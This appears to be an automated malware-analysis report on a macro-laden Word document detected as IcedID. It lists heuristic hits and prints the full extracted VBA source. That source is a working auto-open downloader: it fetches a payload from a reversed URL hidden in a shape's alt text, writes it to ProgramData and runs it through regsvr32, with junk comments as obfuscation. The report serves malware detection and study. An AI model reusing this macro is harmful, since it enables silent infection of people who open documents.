MALICIOUS
230
Risk Score
Heuristics 6
-
ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set oLffk = CreateObject("Script" + fEgQv) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 11983 bytes |
SHA-256: e9e767875f2c8ccb1b77b7997b6fad8fead046dcd6a5c443add96abc46fad61c |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "qlBCv"
Sub ZoSTL(zsNQo, Optional ByVal VFuKz As String = "c:\programdata\gJUdx.txt", Optional ByVal fEgQv As String = "ing.FileSystemObject")
' Endow
' Tastes unimpressed reproducibly
' Kneecaps jamaican achings
' Interrogatives lubricating legends emancipator
' Boldness squeezes legislators
' Flawless deeper landscaped garrottes reiterates reviews
' Puppy erosive baboon foully
' Mortifying bottomed naturalists handlers
' Scorned
' Conceited pre inappropriate
' Uprating unemployed
' Overcharging immediate column
' Ingression revisit decipherment
' Monitoring ceramic extravagant greyhound
' Masculine hipsters autocratic crack
' Retentiveness
' Ding
' Ephemeral dictionaries paradigm zig
' Hoodlum negated catch outsider
' Cheering obscenities redwood
Set oLffk = CreateObject("Script" + fEgQv)
' Copyrightable fretless
' Ludicrous lucifer
' Birched prostrating gateaus ambiguously
' Darkens satanically
' Geneticists tramples
' Hurries folder darning sect
' Meeker maisonette clubhouse
Set MuJUW = oLffk.CreateTextFile(VFuKz)
' Uncatalogued backlight pinstripe tempter eats vistas ruinously
' Logs clinician burdens
' Palatable halters
' Slaughtering hobnailed regales bloodline
' Castaways surgical workless
MuJUW.WriteLine zsNQo
' Governance impracticality
' Ectoplasm bronchi modified tinkled
' God marigolds
' Violinist
' Odour nationalism sprig stomach
MuJUW.Close
' Percussive colourisation
' Incite gutting bloodsport sophisticate
' Cheekbones dutchman tuned
' Trim impend
' Autistic misheard alarms
' Depose devoutness fluxes thematic
' Frequencies disaffected
' Disc lachrymal
' Scattering briny
' Triplet vandalise abominably
' Vitiate fouled clue barest
' Sync waterline retests
' Bannisters laughed battleaxe pounced
' Backups fatuous oriented
' Encircles generates category moraines
' Elitist
' Epilogue unencrypted
' Sociopolitical silicates greenwich spasm
' Glade buckpassing
' Moister homozygous insertions debtor
' Brimming
' Literary terns fried aimlessly
' Arc pharmacist clever uneatable
' Antiques
' Consultancy pounced
' Vet perquisites paediatrics dusted captive pacific replicable
' Fourths
' Herm citron belay effectually
' Laches flaw detester
' Bedstead riots protestant shuttle oxidising
' Intending dessicated intervening
' Sleazier
' Symbols
' Teetotal
' Pied domestication timber
' Compounded replicas overwrought completions subeditors
' Prefaces maizes bandages floorboard
' Bellow effrontery syntactic slimes bolsters
' Sluiced valueformoney
' Expels
' Subsurface response obscuring meringues radiotherapy watchers
' Club multiplexes grovelled
End Sub
' Abhorrence blankets
' Knifepoint icy
' Macintosh assailable indictment amass
' Quondam disapprovingly ragamuffin mined
Sub AutoOpen()
' Realism inscribing furrows comparability squeezy
' Assemblies unparodied caprice
' Unzipped oneness sieges synaptic
' Intimidating clasper
' Zambia gauntlets impressionistic retards
' Disorganisation unusable prodigious curing
' Wrenched houseboat decommissioned disenfranchising
' Upheld continual discursively
' Protactinium gillie
' Airlift greataunts
' Triggering galvanised reflux pilgrimages protists
' Unhook kept sufficient ark anthropic
' Bowman tautological abridged banker
' Underachieving admitting provocatively broadswords grandmas
' Wellingtons spilling
' Fathers spain incurring
' Puny
' Lightening volcano
' Smoothness jollily
' Farad
' Wailing enclosures turnip
' Amputation drafty banquets topologically interceptions standardisations
' Quatrain disbursement sacrifice uncivil paternal
' Dividing lineouts sweating
' Brio
' Recombinant footloose eyelike unidentifiable incline springy
' Dictator headnote virtues
' Indicator accorded virile shackles
' Separates crofters muslims flatulent beefeater
' Acquires dissections
Dim RcnCG As New UqPjU
' Absolutism gooseberries
' Needs sacked prolifically
' Zion
' Secateurs flowerpot flyover
' Scribbling politely parrots
zsNQo = RcnCG.BRotJ("MSXML2.serverXMLHTTP")
' Amassing demilitarised untangle telepathically
' Aspirant stylishly researchers
' Ties intangibles spoiling ergophobia diacritical
' Hinting pantomimes stocked
' Giraffes eyeteeth spectrometry hip
' Blasphemies character headlands olives abhors singlemindedness
' Pirates posting instants
ZoSTL AzDRk(zsNQo)
' Patch
' Cooperation sorghum
' Deformed alibaba serifs
' Groaner
' Inestimably
' Arches lobelia apish feckless godlessness
' Centenarians fraudsters same
' Sorely stampeding
' Limply wood
' Liners roadshows
KHQmw IPSxZ(0) + "vr32 c:\programdata\gJUdx.txt", "ws"
End Sub
Function uvSyV(AOpFF, MrASk)
' Mice unskilful boozers
' Tops binaries cause snugly
' Predominance tails
' Alms froths attaining
uvSyV = Split(AOpFF, MrASk)
End Function
Attribute VB_Name = "gvXzI"
' Foreseeing severed satirically missile monotonously atrial aircraft
' Hydrology chairpersons chary rasters deregulate
' Inundate windscreens card quadruples
' Glistening plainly down
' Unclesam bankrupted filmic flow punished
' Presentiment fillings spewed
Function AzDRk(YraHu)
' Amine performs coolness
' Bits desertion
' Protesters stumbling tenets
' Pregnant headboards antibiotics juicier
' Beauts hardness lowlanders
' Dustily situational denunciations
AzDRk = StrConv(YraHu, vbUnicode)
' Eclecticism trained
' Claims cuckold culling
' Brunt habitual airless
' Humouring
' Disembark classes remediable
End Function
' Inalienable sirius behoves
' Besides swiftest septicaemia
' Heater cottages heavyweight
' Instructing immunisation associateship reconstructions authority
' Seethes blurring predator
' Annulled gaze rending
Function nEDVs()
' Irrefutable arable bricklayers
' Payable lonely
' Cabinets cuteness proclaimers marines
' Chromatographic brokered splendid slushy
' Derailment anchorite wombats daydream
' Crevasse cheerleaders shredders
' Shekel suffrage skimped
' Folders entangling chunkier immunologists
' Snarling disconsolation platforms
' Pitch imported
With ActiveDocument.shapes(1)
nEDVs = .AlternativeText
End With
End Function
' Murderer
' Disciplinarian prows epaulettes steppes upperclass
' Strident deconvolution stars haydn reincarnating
' Gloss chaired
' Antidepressant palaeontology
' Twitch prolong underhand axiom anodised
Function IPSxZ(HRuYq)
' Benefiting pickaxe
' Lubbers bifocals participates
' Outstrip interweaving potentially falser pagodas jinxed thesauri
' Salesmen lauds strident
' Preservatives diagram insulting denies
' Desecrated measureless
' Exchanger performer scored hydroxide dourness
' Lifebelt baseless brood
' Deafest numerous fresher
' Dover disfranchise phonetics fertility
' Certifiably anniversaries whiskeys bombs fireworks
qTUJG = nEDVs()
WnuQo = uvSyV(qTUJG, "###")
iCQuG = WnuQo(HRuYq)
IPSxZ = iCQuG
End Function
Attribute VB_Name = "UqPjU"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
Dim i As Integer
Dim StrNew As String
Dim strOld As String
strOld = Trim(Text)
For i = 1 To Len(strOld)
StrNew = Mid(strOld, i, 1) & StrNew
Next i
Reverse = StrNew
End Function
' Secondhand
' Perhaps
' Misanalysed meteor entertainingly baobabs deal merged
' Strategist unjustness aiders jauntily
' Jetplane belles
' Quotas articulately premises bereave
' Peps snorer oppressor quiesced ignorant seriousness
Function BRotJ(vGIpD)
' Overstatement
' Revisionists designation meetings
' Wicket technologically
' Detours ticking overcrowded
Dim hgEtF As Object
' Canted gourd skillful deciding postbox now
' Temerity cashes perspicuous disinterestedness crane
' Karma radioactive
' Unquote gardening
' Periscope understated careworn
' Lark blackballing intervenes undulation alterego monsieur
' Unlimited rough derivatives splices adjunct manifolds
' Precision closet foragers pearls
' Altimeters hoax annexe polynomially
Set hgEtF = CreateObject(vGIpD)
' Enshroud fluff
' Assault
' Dwell denouncing
' Velodrome chocks irreducibly rejecting blenders devalue
' Magnetised improved remedying satiny silvers
' Narrower rescued spurious smuts blurb
' Millennial waiver
' Stiffen leasing bigots driveins
' Baiting watchmakers spooked shrine between
' Precursor microcosmic later lurks
' Excised
' Fryers ineffectiveness
' Falteringly defect hilly encirclement
' Ichneumon noctuids unstated
' Yuppie appointed chordal
' Crescendo sputum untruthfully
' Baselines unidentifiable roves
' Erects
' Kith oompah greataunt inexorable besetting showery protestors
' Vendetta inflows inhumanely
' Decimate epoxy
' Lunging wash somnolent
' Pattered draftier hungrily rollercoaster contribution trudges
' Puss interceptions regularity
' Snowstorm armpit
JLQMK = IPSxZ(1)
' Is congratulating bespoke felled
' Homologues
' Chlamydia overreacting
' Pilchards cylinder childly
' Bed
' Flats
' Icebox decagons bougainvillea might consonant conveyor
hgEtF.Open "GET", Reverse(JLQMK), False
' Weakness urns dashes
' Windowless provokingly endurable confusedly capacitance heckler serpentine
' Seal revelries legation
' Lefthander comedians
' Caretaker charlatan
' Repeatably
hgEtF.Send
' Mockingly gamesmanship berated sank horsewhip scraps
' Separation disabled races
' Iridescence aloud
' Rediscovered airtight obsolescent
BRotJ = hgEtF.responsebody
End Function
Attribute VB_Name = "GgTNR"
Sub KHQmw(tRRij, HGoBB)
' Spiritualised soulfully misguided awoken desolation
' Juiciness accounted idled
' Surviving asks
' Orchids misbehaviour
' Roundhouse fibula
Set kPeWK = CreateObject(HGoBB + "cript.shell")
' Jaws gadgetry rented
' Incant pinstripe sofa
' Polyhedron flayed intense emphasis
' Unassailable replacement inductor
' Intelligences garages intracellular widen recouple
' Flamboyantly palpitate stores hatched
' Monolithic tars cooped epically
' Swains deliciously speaks hovers
' Garnish ameliorated sturdily millionaire
' Enlisted swimmingly scintillators desserts definition
' Firstborns opals
' Penetrate hafts dangle unreformed
' Staffing
' Lieutenant loading blights botched slushes
' Vein intonation
' Someday
' Voiding illusions pluck
' Ambulatory
' Rightwinger invading worshippers revamped
' Theodolites criticised splendid
' Selfrighteousness kiss relapse mermaid
' Scar punctuating lawmen tempers greasepaint
' Brainless commencement
' Rankers disharmony locksmith hacked
' Ramps manhood product
' Muscular detectives search
' Footpath unhonoured extraterritorial
' Juleps hitherto dingo
' Financing guided unlawfulness appointee
' Needling
' Signified crusts referrals relied december
' Illusive platforms desultoriness musingly educationalist
' Spyhole area
' Befriending maternally
' Originality ridden pingpong inherit
' Sturdier capabilities futurity
' Meddles disarm
' Incontestably
' Diggers schemas
' Blanked hoaxer unidirectional extrication along
' Exceptions expansive context cushioned
' Mosques memorisation inaugural
' Scatters medallions coronary birefringent fricatives
' Impregnation eliciting microfilming toy deconstructive
' Polymers
' Misspent prank shipboard
' Teen fibula
' Terrine injurious
kPeWK.exec tRRij
' Alights rissole lettuce bombasts
' Book betrayers
' Enrobed lymphocyte ravages titanium
' Quantum
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 44544 bytes |
SHA-256: f5a06b56d5fec37583dc649592a4541b8459d701b99b8250a4dab838d1e5c136 |
|||
|
Detection
ClamAV:
Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.